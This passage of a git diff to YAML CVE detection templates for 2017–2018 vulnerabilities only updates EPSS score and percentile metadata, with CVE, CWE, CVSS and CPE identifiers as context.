cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.2765 + epss-percentile: 0.27598 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 82789329bc0..0ad07c5c00e 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.27561 + epss-percentile: 0.27509 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index eaac300740d..c8c8cfe624f 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.27561 + epss-percentile: 0.27509 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 02451d0dc8e..c427b21919f 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.27561 + epss-percentile: 0.27509 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index fde2c7e15e6..08423e0bf98 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.27561 + epss-percentile: 0.27509 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 45c8a8e547e..01b4866d7b0 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.27561 + epss-percentile: 0.27509 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18580.yaml b/http/cves/2017/CVE-2017-18580.yaml index f26b3655ec9..7d3b54b4f5b 100644 --- a/http/cves/2017/CVE-2017-18580.yaml +++ b/http/cves/2017/CVE-2017-18580.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2017-18580 cwe-id: CWE-94 - epss-score: 0.75969 - epss-percentile: 0.98871 + epss-score: 0.75163 + epss-percentile: 0.9883 metadata: verified: true max-request: 4 diff --git a/http/cves/2017/CVE-2017-18590.yaml b/http/cves/2017/CVE-2017-18590.yaml index 751f50bef74..86d4e050b57 100644 --- a/http/cves/2017/CVE-2017-18590.yaml +++ b/http/cves/2017/CVE-2017-18590.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18590 cwe-id: CWE-79 - epss-score: 0.00075 - epss-percentile: 0.22928 + epss-score: 0.00036 + epss-percentile: 0.10642 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index a138798e299..739d3688089 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 - epss-score: 0.02107 - epss-percentile: 0.83654 + epss-score: 0.00764 + epss-percentile: 0.72909 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 700ee5cbe24..b7d37fe29f1 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.90804 - epss-percentile: 0.99604 + epss-percentile: 0.99603 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-20192.yaml b/http/cves/2017/CVE-2017-20192.yaml index 17d481f48de..ed13e408cf2 100644 --- a/http/cves/2017/CVE-2017-20192.yaml +++ b/http/cves/2017/CVE-2017-20192.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-20192 - epss-score: 0.2647 - epss-percentile: 0.96164 + epss-score: 0.22167 + epss-percentile: 0.95615 cwe-id: CWE-79 cpe: cpe:2.3:a:strategy11:formidable_forms:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2017/CVE-2017-20194.yaml b/http/cves/2017/CVE-2017-20194.yaml index 0c4d3190324..e4eedd86387 100644 --- a/http/cves/2017/CVE-2017-20194.yaml +++ b/http/cves/2017/CVE-2017-20194.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-20194 cwe-id: CWE-200 epss-score: 0.10488 - epss-percentile: 0.93029 + epss-percentile: 0.93022 cpe: cpe:2.3:a:strategy11:formidable_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-3131.yaml b/http/cves/2017/CVE-2017-3131.yaml index 45c36de3961..74f5a1c7348 100644 --- a/http/cves/2017/CVE-2017-3131.yaml +++ b/http/cves/2017/CVE-2017-3131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3131 cwe-id: CWE-79 epss-score: 0.11481 - epss-percentile: 0.934 + epss-percentile: 0.93394 cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:* metadata: vendor: fortinet diff --git a/http/cves/2017/CVE-2017-3132.yaml b/http/cves/2017/CVE-2017-3132.yaml index 2fce879382f..07cd0852a4a 100644 --- a/http/cves/2017/CVE-2017-3132.yaml +++ b/http/cves/2017/CVE-2017-3132.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3132 cwe-id: CWE-79 epss-score: 0.08784 - epss-percentile: 0.9227 + epss-percentile: 0.92263 cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:* metadata: vendor: fortinet diff --git a/http/cves/2017/CVE-2017-3133.yaml b/http/cves/2017/CVE-2017-3133.yaml index 8df7280f4b7..ca55a3595cc 100644 --- a/http/cves/2017/CVE-2017-3133.yaml +++ b/http/cves/2017/CVE-2017-3133.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3133 cwe-id: CWE-79 epss-score: 0.0869 - epss-percentile: 0.9222 + epss-percentile: 0.92213 cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:* metadata: vendor: fortinet diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 9ab28bae678..4e76c3205f8 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - epss-score: 0.94393 - epss-percentile: 0.99971 + epss-score: 0.94354 + epss-percentile: 0.99956 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 035bd68c7a6..8a421a0ffe9 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.43239 - epss-percentile: 0.97388 + epss-percentile: 0.97385 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 4823ee11a87..ddfc7f8d597 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.1089 - epss-percentile: 0.93166 + epss-percentile: 0.93161 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 043819de156..59bd5e25369 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.2527 - epss-percentile: 0.96022 + epss-percentile: 0.96025 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5868.yaml b/http/cves/2017/CVE-2017-5868.yaml index 1a2e6318ca6..b1499bb30d0 100644 --- a/http/cves/2017/CVE-2017-5868.yaml +++ b/http/cves/2017/CVE-2017-5868.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-5868 cwe-id: CWE-93 epss-score: 0.08462 - epss-percentile: 0.92084 + epss-percentile: 0.92078 cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5871.yaml b/http/cves/2017/CVE-2017-5871.yaml index 621e2cd25a5..c22a3aa699e 100644 --- a/http/cves/2017/CVE-2017-5871.yaml +++ b/http/cves/2017/CVE-2017-5871.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5871 cwe-id: CWE-601 epss-score: 0.02676 - epss-percentile: 0.85411 + epss-percentile: 0.85408 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5983.yaml b/http/cves/2017/CVE-2017-5983.yaml index f0eb61009d2..735abdf816f 100644 --- a/http/cves/2017/CVE-2017-5983.yaml +++ b/http/cves/2017/CVE-2017-5983.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5983 cwe-id: CWE-502 epss-score: 0.08385 - epss-percentile: 0.92041 + epss-percentile: 0.92036 cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 1aaa49bb77a..24b1577fc3e 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.08891 - epss-percentile: 0.92317 + epss-percentile: 0.9231 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index dc421582b37..4173e98d071 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7855 cwe-id: CWE-79 epss-score: 0.00545 - epss-percentile: 0.67199 + epss-percentile: 0.67184 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index fd9f18f63eb..c8f9d728152 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.94097 - epss-percentile: 0.99903 + epss-percentile: 0.99901 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 3d640dece02..7fb07975f2e 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 epss-score: 0.80406 - epss-percentile: 0.99085 + epss-percentile: 0.99087 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 1aea0e7b78a..fbb8f9bd778 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 - epss-score: 0.94513 + epss-score: 0.94503 epss-percentile: 1 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 14a5c1147d5..2411382718b 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.02863 - epss-percentile: 0.85863 + epss-percentile: 0.85861 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index e75c4853c7c..786fe5cf82a 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.50415 - epss-percentile: 0.97753 + epss-percentile: 0.97748 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 136fa274586..4183b05892b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.37506 - epss-percentile: 0.97062 + epss-percentile: 0.97064 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9965.yaml b/http/cves/2017/CVE-2017-9965.yaml index 44f2c8e5bd8..2488242406b 100644 --- a/http/cves/2017/CVE-2017-9965.yaml +++ b/http/cves/2017/CVE-2017-9965.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9965 cwe-id: CWE-22 epss-score: 0.00211 - epss-percentile: 0.43541 + epss-percentile: 0.43502 cpe: cpe:2.3:a:schneider-electric:pelco_videoxpert:*:*:*:*:enterprise:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 83734e3eb95..6ab5fd5e6ea 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.68636 - epss-percentile: 0.98561 + epss-percentile: 0.98562 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 3a8150f26b3..060bfcf8243 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.91608 - epss-percentile: 0.99658 + epss-percentile: 0.99657 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 9d63a3ea238..06cd66ae2cc 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00883 - epss-percentile: 0.74947 + epss-percentile: 0.74929 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 6e02fef69de..f35d35724ab 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.0104 - epss-percentile: 0.7698 + epss-percentile: 0.7697 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index ad05fac53c7..cd4c6e97ef6 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.67408 - epss-percentile: 0.98511 + epss-percentile: 0.98513 cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index ce79d819577..222ab2a9d02 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.53955 - epss-percentile: 0.97919 + epss-percentile: 0.97917 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 578329b908d..a38fcfbc5b4 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.44152 - epss-percentile: 0.97433 + epss-percentile: 0.9743 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 2c0083ff8f8..9ef7ae2fa06 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.81415 - epss-percentile: 0.99135 + epss-percentile: 0.99137 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index dc9c2faab18..0c5924ab6e2 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.03364 - epss-percentile: 0.87005 + epss-percentile: 0.87007 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 20948017321..20dacb28567 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-10562 cwe-id: CWE-78 epss-score: 0.94028 - epss-percentile: 0.99892 + epss-percentile: 0.9989 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11133.yaml b/http/cves/2018/CVE-2018-11133.yaml index a7dc0f30a1f..7c162e4b4d0 100644 --- a/http/cves/2018/CVE-2018-11133.yaml +++ b/http/cves/2018/CVE-2018-11133.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11133 cwe-id: CWE-79 epss-score: 0.00048 - epss-percentile: 0.15156 + epss-percentile: 0.15097 cpe: cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index da9daf831a5..887659a51aa 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.795 - epss-percentile: 0.99041 + epss-percentile: 0.9904 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 77a539017b3..8ff6fcee820 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.01086 - epss-percentile: 0.77446 + epss-percentile: 0.77443 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11511.yaml b/http/cves/2018/CVE-2018-11511.yaml index a529d040a13..1c2b7906338 100644 --- a/http/cves/2018/CVE-2018-11511.yaml +++ b/http/cves/2018/CVE-2018-11511.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-11511 epss-score: 0.14317 - epss-percentile: 0.942 + epss-percentile: 0.94197 cwe-id: CWE-89 cpe: cpe:2.3:a:asustor:asustor_data_master:3.1.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-11686.yaml b/http/cves/2018/CVE-2018-11686.yaml index e405147d14d..8ba75d486d0 100644 --- a/http/cves/2018/CVE-2018-11686.yaml +++ b/http/cves/2018/CVE-2018-11686.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11686 cwe-id: CWE-20 epss-score: 0.92639 - epss-percentile: 0.99733 + epss-percentile: 0.99732 cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 22dd9283339..d250944c31e 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.15008 - epss-percentile: 0.94353 + epss-percentile: 0.9435 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 391d12a2ad1..edd4c82bc3f 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.94431 - epss-percentile: 0.99984 + epss-percentile: 0.99982 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 3c3e04e048f..ac48ff5c1b1 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.74839 - epss-percentile: 0.9882 + epss-percentile: 0.98818 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index b0c76598737..39937b33a9b 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.12697 - epss-percentile: 0.93772 + epss-percentile: 0.93767 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml index c6cd1b9ad85..72609912a2a 100644 --- a/http/cves/2018/CVE-2018-1217.yaml +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1217 epss-score: 0.65914 - epss-percentile: 0.9845 + epss-percentile: 0.98453 cwe-id: CWE-862 cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 7e9fe83c780..974d7ff3ade 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.75166 - epss-percentile: 0.98832 + epss-percentile: 0.9883 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 052e35d3c85..4c6edfa8bc0 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.20557 - epss-percentile: 0.95388 + epss-percentile: 0.95389 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12455.yaml b/http/cves/2018/CVE-2018-12455.yaml index e009aa5396e..921f9b82d00 100644 --- a/http/cves/2018/CVE-2018-12455.yaml +++ b/http/cves/2018/CVE-2018-12455.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12455 cwe-id: CWE-287 epss-score: 0.24004 - epss-percentile: 0.95855 + epss-percentile: 0.95859 cpe: cpe:2.3:h:intelbras:nplug:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 61d478396f8..ec4bd10cc24 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.08842 - epss-percentile: 0.92295 + epss-percentile: 0.92289 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index df6a2a57a87..eae2b018130 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.91006 - epss-percentile: 0.99618 + epss-percentile: 0.99616 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 46bdb52c389..cf6b2647b46 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.87195 - epss-percentile: 0.99422 + epss-percentile: 0.99424 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12998.yaml 